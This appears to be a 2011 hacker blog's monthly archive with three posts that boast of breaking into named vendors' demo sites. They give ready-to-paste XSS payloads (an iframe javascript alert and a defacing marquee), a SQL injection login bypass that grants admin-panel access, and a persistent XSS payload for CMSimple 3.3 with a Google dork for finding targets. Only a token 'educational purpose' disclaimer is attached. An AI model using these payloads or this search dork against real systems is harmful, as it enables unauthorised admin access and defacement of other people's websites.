Monthly Archives: July 2011

Coupon codes XSSed by me ;)

vendor: www.bacsdemo.com/admindemo/

XSS vulnerability in the admin panel->static page->add new section. In html mode type the following string:

“%3E%3Ciframe src=”javascript:alert(‘XSSed by 3psil0nLamBdA’);”%3E

%3C/iframe%3E

XSS vulnerability in admin panel->tags->manage tags section.

In the search box type in the following string:

“%3E%3Cmarquee%3E%3Ch1%3EHacker%3C/h1%3E%3C/marquee%3E

The webpage is defaced with the following marquee on the screen.\m/

Cheers

3psil0nLamBdA

Advertisements

sphider.eu hack ~ SQLi vulnerability ~ 3pl0iteD

DISCLAIMER:

The exploit published here is just for educational purpose. 3psil0nLaMdA bears no responsibility whatsoever for the mis use of this.

——————————————————————————————————————————————————

Well guys, the demo of sphider.eu has a sql injection vulnerability.

The exploit is as follows.

username: ' or 0=0 #
Password: ' or 0=0 #
Click log in - And Voila!! You get access to the admin panel ;)

Until next time
3psil0nlambda signing off :)

CMSimple XSS Vulnerability 3xpl0it

* Persistent XSS vulnerability in CMSIMPLE 3.3
Google dork: Powered by CMSimple

published by: http://packetstormsecurity.org/files/author/8964/

After login to the demo with password=test, choose edit mode, and then, choose
html button in the toolbox, and write the below code, after clearing off the
existing code there. A pop up comes showing persistent xss vulnerability in the
full version.

Exploit: %3CIFRAME SRC=”javascript:alert(‘XSS’);”%3E%3C%2FIFRAME%3E

PS: In the demo, as they have mentioned in the site, the write option to files
have been disabled, unlike fullversion. So, here we can only see the way the
script behaves in the layout which shows xss vulnerability, which shall be
persistent in the full version once the write permissions are allowed.

———————————————————————————–
Thanks to side-effects for his valuable guidance and greets to taashu for her
love and support.

Cheers \m/
3psil0nLambdA